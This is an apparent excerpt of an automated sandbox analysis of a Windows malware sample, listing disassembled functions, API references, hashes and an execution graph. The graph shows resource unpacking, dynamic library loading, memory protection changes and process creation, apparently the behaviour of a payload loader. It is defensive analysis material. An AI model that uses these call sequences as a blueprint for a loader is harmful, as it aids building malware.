                                                                                        • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                        • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                        Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 00414744
                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                        • __getptd.LIBCMT ref: 0041475B
                                                                                        • __amsg_exit.LIBCMT ref: 00414769
                                                                                        • __lock.LIBCMT ref: 00414779
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                        • String ID: @.B
                                                                                        • API String ID: 3521780317-470711618
                                                                                        • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                        • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                        • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                        • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                        Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 0040C6C8
                                                                                        • __fileno.LIBCMT ref: 0040C6D6
                                                                                        • __fileno.LIBCMT ref: 0040C6E2
                                                                                        • __fileno.LIBCMT ref: 0040C6EE
                                                                                        • __fileno.LIBCMT ref: 0040C6FE
                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2805327698-0
                                                                                        • Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                                        • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                        • Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                                        • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                        Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 00413FD8
                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                        • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                        • __lock.LIBCMT ref: 00414008
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                        • InterlockedIncrement.KERNEL32(1CFD1660), ref: 00414050
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                        • String ID:
                                                                                        • API String ID: 4271482742-0
                                                                                        • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                        • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                        • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                        • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                        Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                        • API String ID: 1646373207-3105848591
                                                                                        • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                        • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                        • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                        • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                        Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __fileno.LIBCMT ref: 0040C77C
                                                                                        • __locking.LIBCMT ref: 0040C791
                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                        • String ID:
                                                                                        • API String ID: 2395185920-0
                                                                                        • Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
                                                                                        • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                        • Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
                                                                                        • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                        Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _fseek_malloc_memset
                                                                                        • String ID:
                                                                                        • API String ID: 208892515-0
                                                                                        • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                        • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                        • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                        • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                        Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                        • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                        • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                        • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                        • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                        Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

                                                                                        Execution Graph

                                                                                        Execution Coverage:9.8%
                                                                                        Dynamic/Decrypted Code Coverage:56.9%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:397
                                                                                        Total number of Limit Nodes:48
                                                                                        execution_graph 44965 2e42b3e0 44966 2e42b402 44965->44966 44968 2e42b543 44966->44968 44969 2e425f38 44966->44969 44970 2e425f69 LdrInitializeThunk 44969->44970 44974 2e42600c 44970->44974 44972 2e4260cc 44972->44968 44973 2e42636b 44978 2e426626 44973->44978 44984 2e42665e 44973->44984 44974->44972 44974->44973 44990 2e425d18 44974->44990 44979 2e42662a 44978->44979 44980 2e425d18 LdrInitializeThunk 44979->44980 44981 2e42668f 44979->44981 44983 2e4269f1 44979->44983 44980->44983 44981->44972 44982 2e425d18 LdrInitializeThunk 44982->44983 44983->44981 44983->44982 44985 2e42666d 44984->44985 44986 2e426667 44984->44986 44985->44972 44986->44985 44987 2e425d18 LdrInitializeThunk 44986->44987 44989 2e4269f1 44986->44989 44987->44989 44988 2e425d18 LdrInitializeThunk 44988->44989 44989->44985 44989->44988 44991 2e425d2a 44990->44991 44992 2e425d2f 44990->44992 44991->44974 44992->44991 44993 2e425fd1 LdrInitializeThunk 44992->44993 44994 2e42600c 44993->44994 44994->44974 44995 2a6bf248 44996 2a6bf28c CloseHandle 44995->44996 44998 2a6bf2d8 44996->44998 44949 2d94e7c0 44950 2d94e80d WaitForInputIdle 44949->44950 44952 2d94e876 44950->44952 44953 2e7c4c28 DuplicateHandle 44954 2e7c4d05 44953->44954 44999 2d949fb0 45000 2d949fbc 44999->45000 45001 2d949ff9 45000->45001 45004 2e7c3cd8 45000->45004 45008 2e7c3cc8 45000->45008 45005 2e7c3ce7 45004->45005 45012 2e7c38a4 45005->45012 45009 2e7c3ce7 45008->45009 45010 2e7c38a4 4 API calls 45009->45010 45011 2e7c3d08 45010->45011 45011->45001 45014 2e7c38af 45012->45014 45016 2e7c49a4 45014->45016 45015 2e7c52fe 45015->45015 45018 2e7c49af 45016->45018 45017 2e7c5f9c 45019 2e7c5ff7 45017->45019 45045 2e824ad1 45017->45045 45018->45017 45018->45019 45025 2e7c77a1 45018->45025 45030 2e7c7801 45018->45030 45035 2e7c7820 45018->45035 45040 2e7c7828 45018->45040 45019->45015 45026 2e7c77ac 45025->45026 45027 2e7c77ec 45026->45027 45049 2e7c79d8 45026->45049 45053 2e7c79c7 45026->45053 45027->45017 45031 2e7c780c 45030->45031 45032 2e7c786d 45031->45032 45033 2e7c79d8 3 API calls 45031->45033 45034 2e7c79c7 3 API calls 45031->45034 45032->45017 45033->45032 45034->45032 45037 2e7c7824 45035->45037 45036 2e7c786d 45036->45017 45037->45036 45038 2e7c79d8 3 API calls 45037->45038 45039 2e7c79c7 3 API calls 45037->45039 45038->45036 45039->45036 45041 2e7c783a 45040->45041 45042 2e7c786d 45041->45042 45043 2e7c79d8 3 API calls 45041->45043 45044 2e7c79c7 3 API calls 45041->45044 45042->45017 45043->45042 45044->45042 45047 2e824b01 45045->45047 45046 2e824b8c 45047->45046 45048 2e824ee0 WaitMessage 45047->45048 45048->45047 45050 2e7c79e5 45049->45050 45052 2e7c7a1e 45050->45052 45057 2e7c5c44 45050->45057 45052->45027 45054 2e7c79d2 45053->45054 45055 2e7c7a1e 45054->45055 45056 2e7c5c44 3 API calls 45054->45056 45055->45027 45056->45055 45058 2e7c5c4f 45057->45058 45060 2e7c7a90 45058->45060 45061 2e7c5c78 45058->45061 45060->45060 45062 2e7c5c83 45061->45062 45068 2e7c5c88 45062->45068 45064 2e7c7aff 45072 2e7cd2b0 45064->45072 45086 2e7cd2c8 45064->45086 45065 2e7c7b39 45065->45060 45069 2e7c5c93 45068->45069 45070 2e7c9080 45069->45070 45071 2e7c7828 3 API calls 45069->45071 45070->45064 45071->45070 45074 2e7cd2bc 45072->45074 45073 2e7cd305 45073->45065 45074->45073 45075 2e7cd3f9 45074->45075 45078 2e7cd2c8 3 API calls 45074->45078 45080 2e7cd2b0 3 API calls 45074->45080 45100 2e7cd540 45074->45100 45076 2e7cd504 45075->45076 45119 2e7cd581 45075->45119 45076->45065 45077 2e7cd345 45103 2e7ce928 45077->45103 45107 2e7ce938 45077->45107 45111 2e7ce8f8 45077->45111 45115 2e7ce8c9 45077->45115 45078->45077 45080->45077 45088 2e7cd2f9 45086->45088 45089 2e7cd3f9 45086->45089 45087 2e7cd305 45087->45065 45088->45087 45092 2e7cd2c8 3 API calls 45088->45092 45093 2e7cd540 GetModuleHandleW 45088->45093 45094 2e7cd2b0 3 API calls 45088->45094 45090 2e7cd504 45089->45090 45099 2e7cd581 GetModuleHandleW 45089->45099 45090->45065 45091 2e7cd345 45095 2e7ce8f8 2 API calls 45091->45095 45096 2e7ce938 2 API calls 45091->45096 45097 2e7ce928 2 API calls 45091->45097 45098 2e7ce8c9 2 API calls 45091->45098 45092->45091 45093->45091 45094->45091 45095->45089 45096->45089 45097->45089 45098->45089 45099->45090 45102 2e7cd581 GetModuleHandleW 45100->45102 45101 2e7cd54a 45101->45077 45102->45101 45104 2e7ce92a 45103->45104 45105 2e7cea12 45104->45105 45124 2e7cf791 45104->45124 45108 2e7ce963 45107->45108 45109 2e7cea12 45108->45109 45110 2e7cf791 2 API calls 45108->45110 45109->45109 45110->45109 45113 2e7ce8fa 45111->45113 45112 2e7ce8fc 45112->45075 45113->45112 45114 2e7cf791 2 API calls 45113->45114 45114->45112 45117 2e7ce8cc 45115->45117 45116 2e7ce8fc 45116->45075 45117->45075 45117->45116 45118 2e7cf791 2 API calls 45117->45118 45118->45116 45122 2e7cd584 45119->45122 45120 2e7cd5c4 45120->45076 45121 2e7cd7e5 GetModuleHandleW 45123 2e7cd824 45121->45123 45122->45120 45122->45121 45123->45076 45125 2e7cf794 45124->45125 45126 2e7cf7c2 45124->45126 45125->45105 45126->45105 45127 2e7cf8d5 45126->45127 45130 2e7cf8f0 CreateWindowExW 45126->45130 45131 2e7cf791 CreateWindowExW 45126->45131 45127->45105 45128 2e7cfa24 CreateWindowExW 45127->45128 45129 2e7cfac6 45128->45129 45130->45127 45131->45127 45132 2d94ebf0 45133 2d94ec12 45132->45133 45134 2d94ed26 45133->45134 45137 2e425f38 2 API calls 45133->45137 45138 2e425d18 LdrInitializeThunk 45133->45138 45139 2e425d16 45133->45139 45149 2e426373 45133->45149 45137->45134 45138->45134 45140 2e425d2a 45139->45140 45141 2e425d2f 45139->45141 45140->45134 45141->45140 45142 2e425fd1 LdrInitializeThunk 45141->45142 45146 2e42600c 45142->45146 45143 2e4260cc 45143->45134 45144 2e42636b 45147 2e426626 LdrInitializeThunk 45144->45147 45148 2e42665e LdrInitializeThunk 45144->45148 45145 2e425d18 LdrInitializeThunk 45145->45146 45146->45143 45146->45144 45146->45145 45147->45143 45148->45143 45153 2e4261f2 45149->45153 45150 2e42636b 45154 2e426626 LdrInitializeThunk 45150->45154 45155 2e42665e LdrInitializeThunk 45150->45155 45151 2e4264bb 45151->45134 45152 2e425d18 LdrInitializeThunk 45152->45153 45153->45150 45153->45152 45154->45151 45155->45151 45156 2d94d830 45157 2d94d85b 45156->45157 45159 2d94d94a 45157->45159 45160 2d94d2e8 45157->45160 45162 2d94e348 CreateProcessW 45160->45162 45163 2d94e609 45162->45163 45164 28c7d030 45165 28c7d048 45164->45165 45166 28c7d0a2 45165->45166 45168 2e820588 45165->45168 45169 2e8205b5 45168->45169 45170 2e8205e7 45169->45170 45174 2e820b11 45169->45174 45178 2e820b18 45169->45178 45182 2e820be4 45169->45182 45176 2e820b18 45174->45176 45175 2e820bb8 45175->45170 45187 2e820bd0 45176->45187 45180 2e820b2c 45178->45180 45179 2e820bb8 45179->45170 45181 2e820bd0 3 API calls 45180->45181 45181->45179 45183 2e820ba2 45182->45183 45184 2e820bf2 45182->45184 45186 2e820bd0 3 API calls 45183->45186 45185 2e820bb8 45185->45170 45186->45185 45188 2e820be1 45187->45188 45191 2e821d9b 45187->45191 45196 2e821caf 45187->45196 45188->45175 45192 2e821daa 45191->45192 45195 2e821caf 3 API calls 45191->45195 45207 2e821db0 45191->45207 45211 2e821dc0 45191->45211 45192->45188 45195->45192 45197 2e821ce2 45196->45197 45198 2e821d5b 45197->45198 45199 2e821dd7 45197->45199 45200 2e821d9f 45197->45200 45198->45188 45202 2e821e5a CallWindowProcW 45199->45202 45203 2e821e09 45199->45203 45204 2e821db0 CallWindowProcW 45200->45204 45205 2e821dc0 CallWindowProcW 45200->45205 45206 2e821caf 2 API calls 45200->45206 45201 2e821daa 45201->45188 45202->45203 45203->45188 45204->45201 45205->45201 45206->45201 45208 2e821e02 45207->45208 45210 2e821e09 45207->45210 45209 2e821e5a CallWindowProcW 45208->45209 45208->45210 45209->45210 45210->45192 45212 2e821e02 45211->45212 45214 2e821e09 45211->45214 45213 2e821e5a CallWindowProcW 45212->45213 45212->45214 45213->45214 45214->45192 45215 40cbf7 45216 40cc08 45215->45216 45259 40d534 HeapCreate 45216->45259 45219 40cc46 45320 41087e 71 API calls 8 library calls 45219->45320 45222 40cc4c 45223 40cc50 45222->45223 45224 40cc58 __RTC_Initialize 45222->45224 45321 40cbb4 62 API calls 3 library calls 45223->45321 45261 411a15 67 API calls 2 library calls 45224->45261 45226 40cc57 45226->45224 45228 40cc66 45229 40cc72 GetCommandLineA 45228->45229 45230 40cc6a 45228->45230 45262 412892 71 API calls 3 library calls 45229->45262 45322 40e79a 62 API calls 3 library calls 45230->45322 45233 40cc71 45233->45229 45234 40cc82 45323 4127d7 107 API calls 3 library calls 45234->45323 45236 40cc8c 45237 40cc90 45236->45237 45238 40cc98 45236->45238 45324 40e79a 62 API calls 3 library calls 45237->45324 45263 41255f 106 API calls 6 library calls 45238->45263 45241 40cc97 45241->45238 45242 40cc9d 45243 40cca1 45242->45243 45244 40cca9 45242->45244 45325 40e79a 62 API calls 3 library calls 45243->45325 45264 40e859 73 API calls 5 library calls 45244->45264 45247 40ccb0 45249 40ccb5 45247->45249 45250 40ccbc 45247->45250 45248 40cca8 45248->45244 45326 40e79a 62 API calls 3 library calls 45249->45326 45265 4019f0 OleInitialize 45250->45265 45253 40ccbb 45253->45250 45254 40ccd8 45255 40ccea 45254->45255 45327 40ea0a 62 API calls _doexit 45254->45327 45328 40ea36 62 API calls _doexit 45255->45328 45258 40ccef __mtinitlocknum 45260 40cc3a 45259->45260 45260->45219 45319 40cbb4 62 API calls 3 library calls 45260->45319 45261->45228 45262->45234 45263->45242 45264->45247 45266 401ab9 45265->45266 45329 40b99e 45266->45329 45268 401abf 45269 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 45268->45269 45299 402467 45268->45299 45270 401dc3 CloseHandle GetModuleHandleA 45269->45270 45277 401c55 45269->45277 45342 401650 45270->45342 45272 401e8b FindResourceA LoadResource LockResource SizeofResource 45344 40b84d 45272->45344 45276 401c9c CloseHandle 45276->45254 45277->45276 45282 401cf9 Module32Next 45277->45282 45278 401ecb _memset 45279 401efc SizeofResource 45278->45279 45280 401f1c 45279->45280 45281 401f5f 45279->45281 45280->45281 45400 401560 __VEC_memcpy __cftoe2_l 45280->45400 45283 401f92 _memset 45281->45283 45401 401560 __VEC_memcpy __cftoe2_l 45281->45401 45282->45270 45293 401d0f 45282->45293 45286 401fa2 FreeResource 45283->45286 45287 40b84d _malloc 62 API calls 45286->45287 45288 401fbb SizeofResource 45287->45288 45289 401fe5 _memset 45288->45289 45290 4020aa LoadLibraryA 45289->45290 45291 401650 45290->45291 45292 40216c GetProcAddress 45291->45292 45295 4021aa 45292->45295 45292->45299 45293->45276 45294 401dad Module32Next 45293->45294 45294->45270 45294->45293 45295->45299 45374 4018f0 45295->45374 45297 40243f 45297->45299 45402 40b6b5 62 API calls 2 library calls 45297->45402 45299->45254 45300 4021f1 45300->45297 45386 401870 45300->45386 45302 402269 VariantInit 45303 401870 75 API calls 45302->45303 45304 40228b VariantInit 45303->45304 45305 4022a7 45304->45305 45306 4022d9 SafeArrayCreate SafeArrayAccessData 45305->45306 45391 40b350 45306->45391 45309 40232c 45310 402354 SafeArrayDestroy 45309->45310 45318 40235b 45309->45318 45310->45318 45311 402392 SafeArrayCreateVector 45312 4023a4 45311->45312 45313 4023bc VariantClear VariantClear 45312->45313 45393 4019a0 45313->45393 45316 40242e 45317 4019a0 65 API calls 45316->45317 45317->45297 45318->45311 45319->45219 45320->45222 45321->45226 45322->45233 45323->45236 45324->45241 45325->45248 45326->45253 45327->45255 45328->45258 45330 40b9aa __mtinitlocknum _strnlen 45329->45330 45331 40b9b8 45330->45331 45334 40b9ec 45330->45334 45403 40bfc1 62 API calls __getptd_noexit 45331->45403 45333 40b9bd 45404 40e744 6 API calls 2 library calls 45333->45404 45405 40d6e0 62 API calls 2 library calls 45334->45405 45337 40b9f3 45406 40b917 120 API calls 3 library calls 45337->45406 45339 40b9ff 45407 40ba18 LeaveCriticalSection _doexit 45339->45407 45340 40b9cd __mtinitlocknum 45340->45268 45343 4017cc _memcpy_s 45342->45343 45343->45272 45345 40b900 45344->45345 45360 40b85f 45344->45360 45415 40d2e3 6 API calls __decode_pointer 45345->45415 45347 40b906 45416 40bfc1 62 API calls __getptd_noexit 45347->45416 45348 40b870 45348->45360 45408 40ec4d 62 API calls 2 library calls 45348->45408 45409 40eaa2 62 API calls 7 library calls 45348->45409 45410 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 45348->45410 45352 401ebf 45362 40af66 45352->45362 45354 40b8bc RtlAllocateHeap 45354->45360 45356 40b8ec 45413 40bfc1 62 API calls __getptd_noexit 45356->45413 45359 40b8f1 45414 40bfc1 62 API calls __getptd_noexit 45359->45414 45360->45348 45360->45352 45360->45354 45360->45356 45360->45359 45411 40b7fe 62 API calls 4 library calls 45360->45411 45412 40d2e3 6 API calls __decode_pointer 45360->45412 45364 40af70 45362->45364 45363 40b84d _malloc 62 API calls 45363->45364 45364->45363 45365 40af8a 45364->45365 45369 40af8c std::bad_alloc::bad_alloc 45364->45369 45417 40d2e3 6 API calls __decode_pointer 45364->45417 45365->45278 45367 40afb2 45419 40af49 62 API calls std::exception::exception 45367->45419 45369->45367 45418 40d2bd 73 API calls __cinit 45369->45418 45370 40afbc 45420 40cd39 RaiseException 45370->45420 45373 40afca 45375 401903 lstrlenA 45374->45375 45376 4018fc 45374->45376 45421 4017e0 45375->45421 45376->45300 45379 401940 GetLastError 45381 40194b MultiByteToWideChar 45379->45381 45382 40198d 45379->45382 45380 401996 45380->45300 45383 4017e0 77 API calls 45381->45383 45382->45380 45437 401030 GetLastError EntryPoint 45382->45437 45384 401970 MultiByteToWideChar 45383->45384 45384->45382 45387 40af66 74 API calls 45386->45387 45388 40187c 45387->45388 45389 401885 SysAllocString 45388->45389 45390 4018a4 45388->45390 45389->45390 45390->45302 45392 40231a SafeArrayUnaccessData 45391->45392 45392->45309 45394 4019aa InterlockedDecrement 45393->45394 45399 4019df VariantClear 45393->45399 45395 4019b8 45394->45395 45394->45399 45396 4019c2 SysFreeString 45395->45396 45397 4019c9 45395->45397 45395->45399 45396->45397 45441 40aec0 63 API calls 2 library calls 45397->45441 45399->45316 45400->45280 45401->45283 45402->45299 45403->45333 45405->45337 45406->45339 45407->45340 45408->45348 45409->45348 45411->45360 45412->45360 45413->45359 45414->45352 45415->45347 45416->45352 45417->45364 45418->45367 45419->45370 45420->45373 45422 4017f3 45421->45422 45423 4017e9 EntryPoint 45421->45423 45424 401805 45422->45424 45425 4017fb EntryPoint 45422->45425 45423->45422 45426 401818 45424->45426 45427 40180e EntryPoint 45424->45427 45425->45424 45428 401844 45426->45428 45429 40183e 45426->45429 45438 40b783 72 API calls 5 library calls 45426->45438 45427->45426 45433 40186d MultiByteToWideChar 45428->45433 45434 40184e EntryPoint 45428->45434 45440 40b743 62 API calls 2 library calls 45428->45440 45439 40b6b5 62 API calls 2 library calls 45429->45439 45433->45379 45433->45380 45434->45428 45435 40182d 45435->45428 45436 401834 EntryPoint 45435->45436 45436->45429 45438->45435 45439->45428 45440->45428 45441->45399 44941 2a6bee60 44943 2a6bee87 44941->44943 44945 2a6bef78 44943->44945 44946 2a6befc1 VirtualProtect 44945->44946 44948 2a6bef56 44946->44948 44955 2e7c49e0 44956 2e7c4a26 GetCurrentProcess 44955->44956 44958 2e7c4a78 GetCurrentThread 44956->44958 44961 2e7c4a71 44956->44961 44959 2e7c4ab5 GetCurrentProcess 44958->44959 44962 2e7c4aae 44958->44962 44960 2e7c4aeb 44959->44960 44963 2e7c4b13 GetCurrentThreadId 44960->44963 